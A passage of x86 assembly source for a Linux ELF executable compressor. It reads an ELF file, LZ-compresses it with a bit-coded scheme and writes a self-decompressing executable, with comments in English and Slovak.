                dw      phdrsize                ;   e_phentsize
phdr:                                                           ; Elf32_Phdr
                dw      1                       ;   e_phnum     ;   p_type
                dw      0                       ;   e_shentsize
                dw      0                       ;   e_shnum     ;   p_offset
                dw      0                       ;   e_shstrndx
ehdrsize        equ     $ - ehdr
                dd      $$                                      ;   p_vaddr
                dd      $$                                      ;   p_paddr
                dd      filesize                                ;   p_filesz
                dd      memsize                                 ;   p_memsz
                dd      111b                                    ;   p_flags
;                       EWR                                    ;Exec,Write,Read
                dd      1000h                                   ;   p_align
phdrsize        equ     $ - phdr

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

START:

        pop     ebx     ; pop number of strings in comand line , must be =3
        dec     ebx
        dec     ebx
        dec     ebx     ; set zero flag if after this EBX=0
        pop     ebx     ; offset of first string ( executable file )
        jz      short mode ; number of strings = 3 = executable + file0 + file1
use:    mov     ecx,usage
        xor     edx,edx
        mov     dl,usagesize
;;;     call    WS
        jmp     short ex00

mode:   pop     ebx     ; pop offset of second string (first string, 0, second
                        ; string, 0, third...)

open:   mov     edi,f0h
        cld

; ebx is now pointed to second string in a shell = in_file
open_f: xor     ecx,ecx ; open flags, open for read-only
;       xor     eax,eax
;       mov     al,5    ; sys_open
        db      6Ah,5   ; push dword 5
        pop     eax
        int     80h     ; open , note - return HANDLE in EAX
        or      eax,eax
        jns     short OK_open
        mov     ecx,MEOF
;       xor     edx,edx
;       mov     dl,MEOFS
        db      6Ah,MEOFS       ; push dword MEOFS
        pop     edx
;;;     call    WS
ex00:   jmp     short ex01
OK_open:stosd           ; store file handle

        pop     ebx     ; EBX pointed to second filename out_file
        mov     ecx,111101101b  ; 111 owner can read, write, execute, 101 group
can read, execute, but don't write / search, other 101 as well groups
;       xor     eax,eax
;       mov     al,8    ; sys_creat
        db      6Ah,8   ; push dword 8
        pop     eax
        int     80h     ; creat , note - return HANDLE in EAX
        or      eax,eax
        jns     short OK_creat
        mov     ecx,MECF
;       xor     edx,edx
;       mov     dl,MECFS
        db      6Ah,MECFS       ; push dword MECFS
        pop     edx
;;;     call    WS
ex01:   jmp     short ex02
OK_creat:stosd          ; store file handle

                        ; EDI=f0s
        mov     ebx,dword [edi - 4*2]   ; handle for in_file
        xor     ecx,ecx ; ECX=0 seek 0 bytes
;       xor     edx,edx
;       inc     edx
;       inc     edx     ; EDX=2 seek to end of file + ECX=0 bytes
        db      6Ah,2   ; push dword 2
        pop     edx
;       xor     eax,eax
;       mov     al,13h  ; sys_seek
        db      6Ah,19  ; push dword 19
        pop     eax
        int     80h     ; note - return filesize in EAX
        or      eax,eax
        jns     short OK_seek_to_end
        mov     ecx,MSEEF
;       xor     edx,edx
;       mov     dl,MSEEFS
        push    byte MSEEFS
        pop     edx
;;;     call    WS
ex02:   jmp     short ex03
OK_seek_to_end:
;;;     or      eax,eax
;;;     jz      ex04    ; filesize=0 -> this file needn't compression
        cmp     eax,f0b_size
        jnbe    ex04    ; LIMIT f0b_size OVERFLOW !!!!!!
        cmp     eax,4Ch
        jbe     ex04    ; can't be a ELF executable, ELF header require 4C
                        ; bytes
        stosd           ; store in_file size to f0s_2
        stosd           ; store in_file size to f0s
        push    eax     ; and push it to stack

        xor     ecx,ecx ; seek 0 bytes
        xor     edx,edx ; seek to begin of file + ECX=0 bytes
;       xor     eax,eax
;       mov     al,13h
        db      6Ah,19  ; push dword 19
        pop     eax
        int     80h
        or      eax,eax
        jns     short OK_seek_to_begin
        mov     ecx,MSEBF
;       xor     edx,edx
;       mov     dl,MSEBFS
        db      6Ah,MSEBFS      ; push dword MSEBFS
        pop     edx
;;;     call    WS
ex03:   jmp     short wsex04
OK_seek_to_begin:

        mov     esi,fy1eObuffer
        mov     edi,f1b

read_f: mov     ecx,esi
        pop     edx     ; pop in_file_size from stack
;       xor     eax,eax
;       mov     al,3    ; sys_read
        db      6Ah,3   ; push dword 3
        pop     eax
        int     80h     ; note - return in EAX number of bytes read (negative
                        ; value if error)
        cmp     eax,edx
        jz      short OK_read
oops:   mov     ecx,MERF
;       xor     edx,edx
;       mov     dl,MERFS
        db      6Ah,MERFS       ; push dword MERFS
        pop     edx
wsex04: call    WS
ex04:   jmp     long ex05       ;short ex05
OK_read:

        add     eax,esi
        mov     dword [konyc_dat],eax
;       mov     ecx,4Ch         ; header size
        db      6Ah,4Ch         ; push dword 4Ch
        pop     ecx
        sub     dword [f0s],ecx
        repz movsb
        push    esi
        mov     esi,uncompress_routine
        mov     cl,uncompress_routine_size
        repz movsb
        pop     esi

; all self compressing is below this:

        movsb           ; first byte, store it, this byte can't be compressed
        call    o_C_0   ; setup [position] and byte on [position]
        dec     dword [f0s]
        jz      near terminate002

;       xor     eax,eax
;       mov     dword [last_delta],eax  ; I know : all data in UDATASEG is zero
;                                       ; but use dirty tricks and must be sure
;                                       ; dword [last_delta] can be non zero if
;                                       ; compressed fy1e overwrite
;                                       ; [last_delta] but i hope that
;                                       ; compressed will be smaller as
;                                       ; original executable
        call    progress

compress002:

        call    scan002

; some optimalizations for found better chain as chain by scan0002
        cmp     eax,1
        jbe     near    cant_optimize_002_L0
; on ESI is EAX lenght chain
; explore if on SI isn't chain with no change delta - if it's use this chain
        call    scanincd        ; include procedure in scan_ncd.inc
        jc      cant_optimize_002_L1
        mov     ebx,dword [last_delta]
; pack without change delta has superior pack priority ( the best pack ratio )
        jmp     near    A08_new_optimalization

cant_optimize_002_L1:
        xchg    dword [last_delta],ebx
        push    ebx
        push    eax
        push    esi
        add     esi,eax
        stc
        cmp     dword [konyc_dat],esi
        jz      chumaj
        inc     esi
        cmp     dword [konyc_dat],esi
        jz      chumaj
        call    scan002
        call    scanincd
chumaj: pop     esi
        pop     eax
        pop     ebx
        xchg    dword [last_delta],ebx
        jnc     near    cant_optimize_002_L0

skus_toto_L0:
        push    ebx
        push    eax
        inc     esi
        call    scan002
        call    scanincd
        dec     esi             ; DEC don't change Carry !!!
        xchg    ecx,eax         ; number of bytes to ECX
                                ; XCHG don't change Carry !!!
        pop     eax             ; POP don't change Carry !!!
        pop     ebx
        jc      try_next_optimalization
; use chain without change delta require less bits for pack ?
        call    bitreq_02
        push    edx             ; number of bits for pack non-optimized chain
        xchg    ecx,eax         ; number of bytes of non-optimized chain -> CX
                        ; number of bytes of chain without change delta -> AX
        push    ebx
        mov     ebx,dword [last_delta]  ; make EBX = EBX in last pack_02
        call    bitreq_02       ; return EDX = number of bits for pack chain
                                ; without change delta
        pop     ebx

        push    edx
        push    eax
        xor     eax,eax         ; simulate pack 1 byte first ( before chain
                                ; without change delta )
        call    bitreq_02
        pop     eax
        add     dword [esp+0*4],edx
        pop     edx
        xchg    ecx,eax         ; restore EAX = number of bytes of
                                ; non-optimized chain
        inc     ecx             ; number of bytes for pack optimized chain
        cmp     eax,ecx
        pop     ecx             ; number of bits for pack non-optimized chain
        jc      near    pack_1_byte_look_better
        cmp     edx,ecx
        jc      near    pack_1_byte_look_better

try_next_optimalization:

        cmp     eax,3
        jc      try_old_optimalization
        push    ebx
        push    eax
        inc     esi
        inc     esi
        call    scan002
        call    scanincd
        dec     esi
        dec     esi
        xchg    ecx,eax         ; number of bytes to ECX
                                ; XCHG don't change Carry !!!
        pop     eax             ; POP don't change Carry !!!
        pop     ebx
        jc      try_old_optimalization
; use chain without change delta require less bits for pack ?
        call    bitreq_02
        push    edx             ; number of bits for pack non-optimized chain
        xchg    ecx,eax         ; number of bytes of non-optimized chain -> CX
                        ; number of bytes of chain without change delta -> AX
        push    ebx
        mov     ebx,dword [last_delta]  ; make EBX = EBX in last pack_02
        call    bitreq_02       ; return EDX = number of bits for pack chain
                                ; without change delta
        pop     ebx

        push    edx
        push    eax
        xor     eax,eax         ; simulate pack 1 byte first ( before chain
                                ; without change delta )
        call    bitreq_02
        pop     eax
        add     dword [esp+0*4],edx
        pop     edx
        xchg    ecx,eax         ; restore EAX = number of bytes of
                                ; non-optimized chain
        inc     ecx
        inc     ecx             ; number of bytes for pack optimized chain
        cmp     eax,ecx
        pop     ecx             ; number of bits for pack non-optimized chain
        jc      near    pack_1_byte_look_better
        cmp     edx,ecx
        jc      near    pack_1_byte_look_better

try_old_optimalization:
        push    esi
        add     esi,eax
        cmp     dword [konyc_dat],esi
        pop     esi
        jz      near    L_NO_0

        call    bitreq_02

        push    ebx
        push    eax
        push    edx
        push    eax

        push    esi
        add     esi,eax
        call    scan002
        call    bitreq_02
        pop     esi
        add     dword [esp+0*4],eax
        add     dword [esp+1*4],edx

        xor     eax,eax
        call    bitreq_02
        push    edx
        inc     esi
        call    scan002
        call    bitreq_02
        dec     esi
        add     dword [esp+0*4],edx
        pop     edx             ; EDX=bits required by pack 1 byte first
        inc     eax             ; EAX=bytes packed in 2 steps , pack 1 byte
                                ; first

        cmp     dword [esp+0*4],eax
        jc      obnov_to
;;;     clc
        jnz     obnov_to
        cmp     edx,dword [esp+1*4]
obnov_to:
        pop     eax
        pop     edx
        pop     eax
        pop     ebx
        jc      near    pack_1_byte_look_better

A08_new_optimalization:
        cmp     eax,3
        jc      near    can_t_use_new_optimalization_08
        push    esi
        add     esi,eax
        inc     esi
        inc     esi
        inc     esi             ; it's very unhappy idea fucking near the death
                                ; this isn't usefull for try code marked
                                ; DANGEROUS for last 3 bytes because this can
                                ; be unstable (data in f0b overleap)
        cmp     dword [konyc_dat],esi
        pop     esi
        jbe     this_is_it
        xchg    dword [last_delta],ebx
        push    ebx
        push    eax
        push    esi
        add     esi,eax
        inc     esi             ; DANGEROUS , ESI+1
        call    scan002
        call    scanincd        ; DANGEROUS , must be ESI + 1 + EAX (where
                                ; EAX > 1)
        pop     esi             ; DEC instruction don't change Carry (=CF) !!!
        pop     eax             ; POP instruction don't change Carry (=CF) !!!
        pop     ebx
        xchg    dword [last_delta],ebx  ; XCHG instruction don't change Carry
                                        ; (=CF) !!!
        jnc     can_t_use_new_optimalization_08

this_is_it:
        push    ebx
        push    eax
        push    edx     ;db     6Ah,0   ; push dword 0  ; bits count=0 but will
                                        ; be overwrited first time because
                                        ; chain > 0 bytes will be found
        db      6Ah,0   ; push dword 0  ; chain lenght counter

new_optimalization_08_L0:
        call    scan_lim                ; scan EAX chain lenght, return min.
                                        ; EBX
        call    scanincd
        jc      new_optimalization_08_L1
        mov     ebx,dword [last_delta]
new_optimalization_08_L1:
        call    bitreq_02
        push    edx
        push    eax
        push    esi
        xchg    dword [last_delta],ebx
        push    ebx
        add     esi,eax
        call    scan002
        call    bitreq_02
        pop     ebx
        xchg    dword [last_delta],ebx
        pop     esi
        add     eax,dword [esp+0*4]
        xchg    ecx,eax
        pop     eax
        add     dword [esp+0*4],edx
        pop     edx
        cmp     dword [esp+0*4],ecx
        jc      toto_bude_asy_lepseeeee
        jnz     toto_bude_asy_horse
        cmp     dword [esp+1*4],edx
        jbe     toto_bude_asy_horse

toto_bude_asy_lepseeeee:
;       mov     dword [esp+2*4],ax
;       mov     dword [esp+3*4],bx
;       mov     dword [esp+0*4],cx
;       mov     dword [esp+1*4],dx
        add     esp, byte 4*4
        push    ebx
        push    eax
        push    edx
        push    ecx
toto_bude_asy_horse:

        dec     eax
        cmp     eax,1
        jnz     new_optimalization_08_L0

        pop     eax
        pop     eax
        pop     eax
        pop     ebx
can_t_use_new_optimalization_08:

L_NO_0:

        cmp     eax,9           ; under 32 bit opcodes it's enough  for 1 MB
                                ; data block
                                ; 16 bit delta is less than 64 kB and require
                                ; max. 4 bytes for calculate it
                                ; Summa: Under DOS its enough use CMP AX,4
                                ;        because small value is fast algorithm
                                ;        Under 32 bit OS ( Linux, NT 4.0 ) use
                                ;        big value if big data block
                                ;        9 is enough for 4 GB of data block
                                ;        Who can produce 4 GB of ASM code ???
        jnc     cant_optimize_002_L0
; i have chain with AX <2,0Fh> and try pack 1 byte AX times
        push    eax
        db      6Ah,0   ;push   0000h           ; bits require counter
        push    eax             ; pack 1 byte AX times
optimize_002_L2:
        xor     eax,eax
        call    bitreq_02       ; include procedure in bitreq02.inc
        inc     esi
        add     dword [esp+1*4],edx     ; bits require counter
        dec     dword [esp+0*4] ; pack 1 byte EAX times
        jnz     optimize_002_L2 ; simulate pack 1 byte EAX times
        pop     eax             ; remove word from stack only
        pop     ecx             ; ECX = required bits count for pack 1 byte EAX
                                ; times
        pop     eax             ; restore EAX
        sub     esi,eax         ; restore ESI

        call    bitreq_02       ; explore once-pack EAX bytes EBX delta bits
                                ; count
                                ; return EDX=bits required
        cmp     edx,ecx
        jc      cant_optimize_002_L0
; use JC for prefer pack 1 byte EAX times
; use JBE for prefer once-pack EAX bytes with delta = EBX
; JC is sometimes better because pack 1 byte don't change delta and it's
; possibility pack without change delta ( call scanincd ) later
; JC has better ratio in my experiments by aprox 1 byte per 1 kB of data but
; this depend on data structure and sometimes JBE can be more rational if
; change delta and later pack with this new delta without change delta

; O.K. pack 1 byte now
pack_1_byte_look_better:
        xor     eax,eax
; now will be packed last 1 byte by call pack002 in a00.asm
; EAX=0

cant_optimize_002_L0:

        call    pack002

        add     esi,eax
        sub     dword [f0s],eax
        pushfd
        call    progress
        popfd
        jnz     near compress002        ; jnz don't handle error if packing
                                        ; more bytes as bytes in f0buffer
                                        ; jnbe is better
        mov     ecx,progress_text
        xor     edx,edx
        inc     edx
        mov     byte [ecx],0Ah
        call    WS

terminate002:

        call    putbit1
        call    putbit1

        xor     eax,eax
        stosb

        mov     ebx,dword [position]
        stc
        rcl     byte [ebx],1
        jc      done_002

flush:  shl     byte [ebx],1
        jnc     flush                   ; shift all control_bits and remove
                                        ; highest ( highest was put in MOV BYTE
                                        ; PTR DS:[DI],1 , INC DI )

done_002:

after_compress:

; modifying data for fill pointer registers in output file

; calculate boundary of moved data
        mov     ecx,f1b
        mov     eax,edi
        sub     eax,f1b - 08048000h + 1
        mov     dword [ecx+4Fh],eax     ; esi value

        mov     eax,edi
        sub     eax,f1b+4Ch+fuyi - 08048000h + 1
        add     eax,dword [ecx+40h]
        mov     dword [ecx+54h],eax     ; edi value

; calculate size of moved data
        mov     eax,edi
        sub     eax,f1b+4Ch+fuyi
        mov     dword [ecx+59h],eax     ; ecx value

; calculate offset after uncompress_routine (esi)
        mov     eax,dword [ecx+40h]
        add     eax,08048000h + uncompress_routine_end - uncompress_moved
        mov     dword [ecx+69h],eax     ; esi value

; calculate offset of moved U13 (ebp)
        sub     eax, byte (uncompress_routine_end - U13)
        mov     dword [ecx+6Eh],eax     ; ebp value

; calculate JUMP
        mov     eax,dword [ecx+18h]
        sub     eax,dword [ecx+40h]
        sub     eax,08048000h + uncompress_routine_end - uncompress_moved
        mov     dword [f1b+0D9h],eax    ;[ecx+0D9h],eax

; modify data in a header
        mov     dword [ecx+18h],0804804Ch       ; START

        mov     eax,edi
                                ; ECX=f1b
        sub     eax,ecx         ; sub   eax,f1b
        mov     dword [ecx+3Ch],eax             ; filesize

        sub     eax, byte ( fuyi + 4Ch + 1 )
        add     dword [ecx+40h],eax             ; memorysize

        mov     byte [ecx+44h],111b             ; Exec,Write,Read

; O.K. going write output...
        mov     ebx,dword [f1h]
                        ; ECX=f1b
;;;     mov     ecx,f1b
        mov     edx,edi
        sub     edx,ecx
;       xor     eax,eax
;       mov     al,4    ; sys_write
        db      6Ah,4   ; push dword 4
        pop     eax
        int     80h
        cmp     eax,edx
        jz      OK_write
        mov     ecx,MEWF
;       xor     edx,edx
;       mov     dl,MEWFS
        db      6Ah,MEWFS       ; push dword MEWFS
        pop     edx
        call    WS
ex05:   jmp     short   exit
OK_write:

        mov     esi,f0h

        lodsd
        xchg    ebx,eax
;       xor     eax,eax
;       mov     al,6    ; sys_close
        db      6Ah,6   ; push dword 6
        pop     eax
        int     80h
        lodsd
        xchg    ebx,eax
;       xor     eax,eax
;       mov     al,6    ; sys_close
        db      6Ah,6   ; push dword 6
        pop     eax
        int     80h

exit:
        xor     ebx,ebx
;       xor     eax,eax
;       inc     eax
        db      6Ah,1
        pop     eax     ; this is better for compress as xor eax,eax inc eax
                        ; sys_exit
        int     80h

WS:     xor     ebx,ebx
        inc     ebx     ; EBX=1 (STDOUT)
;       xor     eax,eax
;       mov     al,4    ; write
        db      6Ah,4   ; push dword 4
        pop     eax
        int     80h
        ret

; -------

scan002:
; input:  chain on ESI
; return: EAX max. lenght ( 0 or 1 for chain not found ) , EBX delta

        push    esi
        push    edi
        xor     edx,edx         ; chain lenght counter
        mov     edi,f0b
        mov     ecx,esi
        sub     ecx,edi
        lodsb
scan_L00:
        jecxz   scan_L04
        repnz scasb
        jnz     scan_L04
        push    eax
        push    ecx
        push    esi
        push    edi
        mov     eax,dword [konyc_dat]
        sub     eax,esi
        mov     ecx,eax
        jecxz   scan_L03
scan_L01:
        repz cmpsb
        jnz     scan_L02
        inc     eax             ; last byte is in chain and must be encountered
scan_L02:
        sub     eax,ecx
        cmp     eax,1           ; chain must be minimal 2 bytes long
        jbe     scan_L03
        cmp     eax,edx
        jc      scan_L03
        xchg    edx,eax
        mov     ebx,esi
        sub     ebx,edi         ; EBX=shift=deta
scan_L03:
        pop     edi
        pop     esi
        pop     ecx
        pop     eax
        jmp     short   scan_L00
scan_L04:
        pop     edi
        pop     esi
        xchg    edx,eax
        ret

; -------

scan_ncd:
; input:  chain on ESI , EAX requested lenght with shift = [last_delta]
; return: EAX max. lenght ( 0 or 1 for chain not found )
        cmp     dword [last_delta], byte 0
        jnz     mozno_aj_bude
        xor     eax,eax
        ret
mozno_aj_bude:
        push    ecx
        push    esi
        push    edi
        mov     edi,esi
        sub     edi,dword [last_delta]
        mov     ecx,eax
        repz cmpsb
        pop     edi
        pop     esi
        jnz     scan_ncd_0
        inc     eax             ; last byte is in chain and must be encountered
scan_ncd_0:
        sub     eax,ecx
        pop     ecx
        ret


scanincd:
; input:  chain on ESI , EAX requested lenght with shift = [last_delta]
; return: CLC ( Carry Flag = 0 ) if chain found , STC (CF=1) if not found
        cmp     dword [last_delta], byte 0
        jnz     mozno_aj_bude_0
        stc
        ret
mozno_aj_bude_0:
        push    ecx
        push    esi
        push    edi
        mov     edi,esi
        sub     edi,dword [last_delta]
        mov     ecx,eax
        repz cmpsb
        pop     edi
        pop     esi
        jnz     nebude_any_ket_sa_zesere_z_blbych_pocytov
        jecxz   zeserau_sa_z_blbych_pocytov
nebude_any_ket_sa_zesere_z_blbych_pocytov:
        stc
        pop     ecx
        ret
zeserau_sa_z_blbych_pocytov:
        clc
        pop     ecx
        ret

; -------

scan_lim:
; input:  chain on ESI , EAX chain lenght , EAX > 1
; return: EBX minimal delta
; this procedure is usefull for call after call scan002 for scan shorter chains
; on this some ESI
; call scan_lim assume that on ESI is chain with {EAX} <3,max_register_limit>
; call scan_lim with EAX = {EAX}-1, {EAX}-2, {EAX}-3, ... , 3, 2
; {EAX} is value returned after call scan002
        push    ecx
        push    edi
        mov     edi,esi
scan_lim_L00:
        dec     edi
;       cmp     edi,f0b         ; call scan_lim assume that longer chain was
;                               ; found
;       jc      scan_lim_L00
        mov     ecx,eax
        push    esi
        push    edi
        repz cmpsb

        pop     edi
        pop     esi
        jnz     scan_lim_L00
        jecxz   scan_lim_L01
        jmp     short   scan_lim_L00
scan_lim_L01:
        mov     ebx,esi
        sub     ebx,edi
        pop     edi
        pop     ecx
        ret

; -------

bitreq_02:
; input  : EAX = number of bytes for pack request
;          EBX = shift = delta ( if EAX = 2 or more )
; output : EDX = number of bits required for pack
; destroy: nothing

        cmp     eax,1
        jnbe    bitreq_more_bytes

bitreq_1_byte:

        db      6Ah,7   ; push doubleword 7
        pop     edx     ; make EDX=7

; scan if can be used 7 bits for pack 1 byte = 00h or 1 byte with shift < 16
; if this can't be used , pack by use 9 bits can be always used

; byte for compress is = 00h ?
        cmp     byte [esi],0
        jz      bitreq_7_bits   ; 7 bits required ( sequence 1100000 )

bitreq_jak_skusas_co_skusas:
; byte isn't = 00h but explore if found equal byte with shift < 16
        push    eax
        mov     al,byte [esi]
        push    ecx
;       xor     ecx,ecx
;       mov     cl,15
        db      6Ah,15
        pop     ecx
        push    edi
        mov     edi,esi
        sub     edi,ecx
        cmp     edi,f0b
        jnc     bitreq_pome_skusat
        mov     edi,f0b
        mov     ecx,esi
        sub     ecx,edi
bitreq_pome_skusat:
        repnz scasb
        pop     edi
        pop     ecx
        pop     eax
        jz      bitreq_7_bits

; always can be used this mode but has bad pack ratio
; pack 1 byte , use 9 bits ( 1 byte + 1 bit )
        mov     dl,9
bitreq_7_bits:
        mov     al,1            ; 1 byte packed EAX=1
        ret

bitreq_more_bytes:

        cmp     ebx,dword [last_delta]
        jnz     bitreq_another_delta

bitreq_old_delta:
        bsr     edx,eax         ; ( bits / 2 ) for calculate bytes count
        lea     edx,[2*edx+4]   ; 4 bits sequence 1000 don't calculate new
                                ; delta
        ret

bitreq_another_delta:
        cmp     ebx,byte 7Fh                            ; cmp ebx,7Fh require 3
                                                        ; bytes
        jnbe    bitreq_big_delta_or_more_bytes
        cmp     eax,4
        jnc     bitreq_big_delta_or_more_bytes

; pack 2 or 3 bytes with delta <+0001h,+007Fh>
        db      6Ah,8+3
        pop     edx     ;mov    edx,8+3                 ; 8 bit = 1 byte for
                                                        ; MOV BL,[ESI]  INC ESI
        ret                             ; 3 bit sequence 111 switch to this
                                        ; mode

bitreq_big_delta_or_more_bytes:
; pack 4 or more bytes with delta <+0001h,maximal_delta)
; pack 2 or more bytes with delta <+0080h,maximal_delta)
        push    eax
        push    ebx

        cmp     ebx,byte 7Fh
        jnbe    bitreq_high_delta
        dec     eax
        dec     eax             ; invert for 2x INC ECX in decompress

bitreq_high_delta:
        bsr     eax,eax         ; (bits/2)  for calculate count

        shr     ebx,8           ; remove BL part of delta
        inc     ebx
        inc     ebx
        inc     ebx             ; invert for 3x DEC EBX in decompress
        bsr     ebx,ebx         ; (bits/2) for calculate delta without BL

        add     eax,ebx
        lea     edx,[2*eax+2+8] ; 2 bit sequence for switch to this mode
                                 ; 8 bit=1 byte for MOV BL,[ESI]   INC ESI
        pop     ebx
        pop     eax
        ret

; -------

pack002:
; input :  EAX = number of bytes for pack request
;          EBX = shift = delta ( if AX = 2 or more )
; output : EAX = number of bytes packed
        cmp     eax,1
        jnbe    pack_more_bytes

pack_1_byte:

; scan if can be used 7 bits for pack 1 byte = 00h or 1 byte with shift < 16
; if this can't be used , pack by use 9 bits can be always used

; byte for compress is = 00h ?
        mov     al,byte [esi]
        or      al,al
        jz      common_7_bits   ; putbit sequence 1100000

jak_skusas_co_skusas:
; byte isn't = 00h but explore if found equal byte with shift < 16
        xor     ecx,ecx
        mov     cl,15
        push    edi
        mov     edi,esi
        sub     edi,ecx
        cmp     edi,f0b
        jnc     pome_skusat
        mov     edi,f0b
        mov     ecx,esi
        sub     ecx,edi
pome_skusat:
        repnz scasb
        pop     edi
        jnz     jerk_it_off_and_try_again
        xchg    ecx,eax
        inc     eax             ; EAX = shift (possitive value)

common_7_bits:

        call    putbit1
        call    putbit1
        call    putbit0
        mov     cl,4
        shl     al,cl
pbimu7: shl     al,1
        call    putbit
        loop    pbimu7

        jmp     short   pack_1_byte_common_end

jerk_it_off_and_try_again:
; always can be used this mode but has bad pack ratio
; pack 1 byte , use 9 bits ( 1 byte + 1 bit )
        movsb
        dec     esi             ; restore ESI to ESI before pack
        call    putbit0

pack_1_byte_common_end:

        xor     eax,eax
        inc     eax             ; 1 byte packed EAX=1

        ret

pack_more_bytes:

        push    eax             ; store EAX for restore number of bytes packed
                                ; ( by POP EAX )
        cmp     ebx,dword [last_delta]
        jnz     another_delta

pack_with_old_delta:
        call    putbit1
        call    putbit0
        call    putbit0
        call    putbit0         ; sequence 1000 don't calculate new delta

        mov     ecx,32
fdcd:   dec     ecx
        shl     eax,1
        jnc     fdcd            ; shift bits left and remove highest bit=1
                                ; this bit will be put by INC CX in decompress
mocd:   shl     eax,1
        call    putbit
        dec     ecx
        jz      mwocd
        call    putbit1
        jmp     short   mocd
mwocd:  call    putbit0
        pop     eax             ; packed EAX bytes from input buffer
        ret

another_delta:
        mov     dword [last_delta],ebx  ; all modes change last_delta
;       cmp     ebx,80h                 ; cmp ebx,80h require 6 bytes
;       jnc     big_delta_or_more_bytes
        db      83h,0FBh,7Fh    ;cmp    ebx,7Fh    ; cmp bx,7Fh require 3 bytes
        jnbe    big_delta_or_more_bytes
        cmp     eax,4
        jnc     big_delta_or_more_bytes

; pack 2 or 3 bytes with delta <+0001h,+007Fh>
        call    putbit1
        call    putbit1                 ; bit sequence 111 switch to this mode
                                        ; third bit 1 will be passed at end of
                                        ; packing before POP AX
        sub     al,3                    ; value 2 -> CF=1, value 3 -> CF=0
        adc     bl,bl
        xchg    ebx,eax
        stosb
        call    putbit1                 ; put last control bit must be after
                                        ; STOSB (for mov bl,[esi] , inc esi)
                                        ; because when decompress , bits are
                                        ; processed first and byte second ->
                                        ; when compressing , byte must be
                                        ; processed before last bit
        pop     eax                     ; value 2 or 3
                                        ;     -> this mode process 2 or 3 bytes
        ret

big_delta_or_more_bytes:
; pack 4 or more bytes with delta <+0001h,maximal_delta)
; pack 2 or more bytes with delta <+0080h,maximal_delta)
        call    putbit1
        call    putbit0

        db      83h,0FBh,7Fh    ;cmp    ebx,7Fh
        jnbe    high_delta
        dec     eax
        dec     eax                     ; invert for 2x INC ECX in decompress
high_delta:

        push    eax
        xchg    ebx,eax
        push    eax             ; push only for part in BL moved to AL
        shr     eax,8           ; this destroy AL
        inc     eax
        inc     eax
        inc     eax             ; invert for 3x DEC EBX

        mov     ecx,32
fgfaad: dec     ecx
        shl     eax,1
        jnc     fgfaad

wetryw: shl     eax,1
        call    putbit
        dec     ecx
        jz      shsdwd
        call    putbit1
        jmp     short   wetryw
shsdwd: call    putbit0
        pop     ebx             ; pop only for BL
        pop     eax             ; pop bytes count

calculate_count:
        mov     ecx,32
fcdcd:  dec     ecx
        shl     eax,1
        jnc     fcdcd           ; shift all bits left and remove highest bit=1
                                ; this bit will be put by INC ECX in decompress
mwocdl: shl     eax,1
        call    putbit
        dec     ecx
        jz      mwocdt
        call    putbit1
        jmp     short   mwocdl
mwocdt:
        xchg    ebx,eax
        stosb                   ; store AL (BL in decompress)
                                ; as well in delta <+0001h,+007Fh> , stored
                                ; byte must be before store last bit because
                                ; when decompress, bit will be processed
                                ; first and byte will be loaded later

        call    putbit0         ; this bit will be processed in
                                ; decompress for calculate ECX ( JC U05 )

        pop     eax             ; packed EAX bytes from input buffer
        ret

; -------

; putbit input  :  Carry Flag (CF=0,CF=1)
;        output :  bit 0. in [position], EDI+1 as need for store bit to [EDI]
;        destroy:  nothing

putbit0:clc                             ; put bit=0
        jmp     short putbit
putbit1:stc                             ; put bit=1
putbit: push    ebx
        mov     ebx,dword [position]
        rcl     byte [ebx],1
        pop     ebx
        jnc     o_C_1
o_C_0:  mov     byte [edi],1
        mov     dword [position],edi
        inc     edi
o_C_1:  ret

; -------

progress:
        pushad
        mov     esi,f0s_2
        mov     edi,progress_text+1
        mov     ebp,w1hch

        lodsd
        push    eax
        sub     eax,dword [esi]

        rol     eax,4
        call    ebp
        rol     eax,4
        call    ebp
        rol     eax,4
        call    ebp
        rol     eax,4
        call    ebp
        rol     eax,4
        call    ebp
        rol     eax,4
        call    ebp
        rol     eax,4
        call    ebp
        rol     eax,4
        call    ebp

        inc     edi
        inc     edi
        pop     eax

        rol     eax,4
        call    ebp
        rol     eax,4
        call    ebp
        rol     eax,4
        call    ebp
        rol     eax,4
        call    ebp
        rol     eax,4
        call    ebp
        rol     eax,4
        call    ebp
        rol     eax,4
        call    ebp
        rol     eax,4
        call    ebp

        mov     ecx,progress_text
        xor     edx,edx
        mov     dl,progress_text_size
        call    WS
        popad
        ret

w1hch:  push    eax
        and     al,00001111b
        cmp     al,10
        sbb     al,69h
        das
        stosb
        pop     eax
        ret

; -------

uncompress_routine:
        pushfd
        pushad
        mov     esi,0
        mov     edi,0
        mov     ecx,0
        std
        repz movsb
        cld
        xchg    esi,edi
        inc     esi
        db      83h,0EFh,fuyi - 1       ; sub edi,fuyi-1
        push    esi
        mov     esi,0
        mov     ebp,0           ; U13
        mov     dl,80h
        ret

fuyi    equ     $ - uncompress_routine

uncompress_moved:
        push    eax

U00:    movsb
U01:    call    ebp
        jnc     U00

        xor     ebx,ebx
        call    ebp
        inc     ecx
        jnc     U03

        call    ebp
        jc      U06

        mov     bl,10h
U02:    call    ebp
        adc     bl,bl
        jnc     U02

        jnz     U10

        xchg    ebx,eax
        jmp     short U12

U03:    inc     ebx
U04:    call    ebp
        adc     ebx,ebx
        call    ebp
        jc      U04

U05:    call    ebp
        adc     ecx,ecx
        call    ebp
        jc      short U05

        dec     ebx
        dec     ebx
        jz      short U09
        dec     ebx
        shl     ebx,8
;;;;;;; clc             ; clc isn't needed because EBX < 01000000h before shift

U06:    mov     bl,byte [esi]
        inc     esi
        jnc     U07

        shr     bl,1
        jz      U15
        sbb     cl,ch           ; equ SBB CL,BH because BH=CH=0

U07:    ;cmp    ebx,00007D00h   ; this is not implemented, yet
        ;jnc    zvys_o_dve      ; i found this in WINCMD32.EXE v. 4.03
        ;cmp    ebx,00000500h   ; packed with ASPACK
        ;jnc    zvys_o_jennu
                ; isn't rational compress 3 bytes with shift > 7CFFh
                ; rational is at least 4 bytes
                ; isn't rational compress 2 bytes with shift > 4FFh
                ; rational is at least 3 bytes
        cmp     ebx, byte 7Fh   ;db     83h,0FBh,7Fh
        jnbe    U08

zvys_o_dve:
        inc     ecx
zvys_o_jennu:
        inc     ecx

U08:    pop     eax
        db      0A8h            ; opcodes A8 5B = TEST AL,5B
U09:    pop     ebx             ; opcode 5B
        push    ebx
U10:    neg     ebx

U11:    mov     al,byte [edi+ebx]
U12:    stosb
        loop    U11
        jmp     short U01

